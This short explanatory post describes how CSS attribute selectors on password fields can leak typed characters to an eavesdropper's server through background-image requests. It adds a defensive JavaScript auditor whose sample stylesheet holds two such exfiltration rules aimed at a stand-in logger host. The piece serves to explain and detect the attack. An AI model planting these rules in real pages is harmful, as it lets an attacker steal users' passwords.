Misusing CSS to Capture Passwords As Users Enter Them


Cascading Style Sheets, considered as a domain-specific language, is powerful enough to let malicious Web designers detect and record plaintext entries in the text fields of interactive Web pages as users type them in. The key idea is to use selectors like input[type="password"][value$="a"] and specify that the background-image should be loaded from some URL on a server whose log the eavesdropper can read. A log entry appears whenever the last character that the user has typed into a password field is a lower-case a. By providing ninety-five such selectors, each loading a different background image from the eavesdropper's server, the eavesdropper can check the log to see which images were requested and in what order, and infer the entered password from that list.
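
A defensive check for the pattern described above, as an added example rather than code from the linked repository: it scans stylesheet text for rules that pair a selector on an input's value attribute with a remotely loaded image. The function names and the sample stylesheet (with .invalid hosts) are constructed for illustration.

```javascript
// Added example: audit a stylesheet for value-attribute selectors that trigger
// a remote url() load. Tokenising is simplified (no escaped quotes).
const VALUE_ATTR = /\[\s*value\s*([$^*~|]?=)\s*("[^"]*"|'[^']*'|[^\]\s]+)\s*(?:[iIsS]\s*)?\]/g;
const REMOTE_URL = /url\(\s*(["']?)((?:https?:)?\/\/[^"')\s]+)\1\s*\)/i;
// A rule is "prelude { declarations }"; quoted strings may contain braces.
const PART = `(?:"[^"]*"|'[^']*'|[^{}"'])`;

function findValueExfilRules(cssText) {
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments
  const rule = new RegExp(`(${PART}+)\\{(${PART}*)\\}`, "g");
  const findings = [];
  let m;
  while ((m = rule.exec(css)) !== null) {
    const url = REMOTE_URL.exec(m[2]);
    if (!url) continue; // nothing is fetched from another origin
    for (const attr of m[1].matchAll(VALUE_ATTR)) {
      findings.push({
        selector: m[1].trim(),
        operator: attr[1],
        matched: attr[2].replace(/^["']|["']$/g, ""),
        // Base URL is a placeholder used only to resolve "//host/path" forms.
        host: new URL(url[2], "https://placeholder.invalid").host,
      });
    }
  }
  return findings;
}

// Many flagged rules pointing at one host is the signature described above.
function summarizeByHost(findings) {
  const counts = {};
  for (const f of findings) counts[f.host] = (counts[f.host] || 0) + 1;
  return counts;
}

// Constructed sample stylesheet: two suspicious rules, two benign ones.
const SAMPLE_CSS = `
/* constructed sample */
input[type="password"][value$="a"] { background-image: url("https://logger.example.invalid/a"); }
input[type="password"][value$="b"] { background-image: url("https://logger.example.invalid/b"); }
input[type="text"] { background-image: url("/img/field.png"); }
input[value=""], .empty { color: gray; }
`;

const hits = findValueExfilRules(SAMPLE_CSS);
console.log(hits, summarizeByHost(hits));
```

Attribute selectors match the value attribute rather than the text being typed, so such rules only fire on pages whose scripts copy each keystroke into that attribute. A Content-Security-Policy with a restrictive img-src blocks the image requests in either case.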

“maxchehab”, GitHub, February 20, 2018

#Cascading-Style-Sheets #keylogging #domain-specific-languages

John David Stone (

created June 1, 2014 · last revised December 10, 2018